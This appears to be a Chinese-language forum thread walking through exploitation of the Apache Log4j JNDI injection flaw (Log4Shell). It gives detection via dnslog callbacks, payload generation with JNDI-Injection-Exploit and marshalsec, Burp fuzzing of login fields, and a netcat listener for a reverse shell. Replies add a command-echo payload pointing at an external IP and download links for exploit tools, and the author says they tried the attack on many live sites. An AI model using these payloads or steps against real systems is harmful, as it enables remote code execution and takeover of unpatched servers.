Apache-Log4j

一 漏洞检测:

  1. xx.24b5010c.dns.1433.eu.org //dnslog地址
    10.10.10.10 //vps外网地址

  2. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping xx.24b5010c.dns.1433.eu.org" -A 10.10.10.10
    得到类似几个地址:
    rmi://10.10.10.10:1099/iqnqyi
    ldap://10.10.10.10:1389/iqnqyi
    rmi://10.10.10.10:1099/3vmqfk
    ldap://10.10.10.10:1389/3vmqfk
    rmi://10.10.10.10:1099/jan8oe

保存fuzz.txt

  1. 在系统登录处或者post主页:
    ${jndi:exp}
    burpsuite exp设置变量,加载字典fuzz.txt,去掉转义,刷新dnslog查看数据。

  2. 记得查看防火墙放行端口。

二 命令执行:

  1. vps开启web服务和监听端口
    python3 -m http.server 9092,以及监听端口nc -l 9091

windows,使用./src/ExecTemplateJDK7.java 修改里面的host和port为要反弹的地址
linux,使用./src/linux.java,其实是cmd.exe改成/bin/bash

  1. 编译:javac ExecTemplateJDK7.java,生成ExecTemplateJDK7.class

  2. 执行:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://10.10.10.10:9092/#ExecTemplateJDK7 1389

  3. 在系统登录处或者post主页:${jndi:exp}
    burpsuite exp设置变量,加载字典fuzz.txt,去掉转义

  4. 看nc情况

打包下载地址:链接: https://pan.baidu.com/s/1Ka2jg-C-Wqn92vFBM2ReNw 提取码: 9e71 复制这段内容后

申明:我测试了好多个站都没有检测成功有,不知道是exp的问题还是站的问题。有复现成功的吱一声谢谢。

burp检测插件ceeio,GitHub - guguyu1/log4j2_burp_scan: log4j2 被动 burp rce扫描工具 get post cookie 全参数识别
dnslog:GitHub - f0ng/log4jscanner: log4j burp插件

1 个赞

土司那边好像有人成功的,不过多数都是本地测试可以目标机器不行的,好像要有触发的类库

靶机地址:https://ctf.bugku.com/challenges/detail/id/340.html
复现可以成功,

也可以直接https://log.咕.com/ 获取 dnslog
登录框输入:${jndi:ldap://xx.24b5010c.dns.1433.eu.org.}直接验证,保留org后面的点

反弹就按上面的来

命令回显使用:JNDIExploit-v1.11.jar

  1. 开启ldap :java -jar JNDIExploit-v1.11.jar -i 0.0.0.0 -l 1389
    2: burp抓包
    头加入 cmd:whoami
    提交数据:
    ${jndi:ldap://167.179.108.116:1389/TomcatBypass/TomcatEcho}

更多回显:https://mp.weixin.qq.com/s/QiK1W-Zo4g-gB4wj2I82bg

弹shell的地方,每太看明白,能详细讲讲么

JNDIExploit-v1.11.jar连接404了,求分享

实际环境下成功过 限制比较多感觉

JNDIExploit-v1.11.jar链接: 百度网盘 请输入提取码 提取码: gcpj

学到了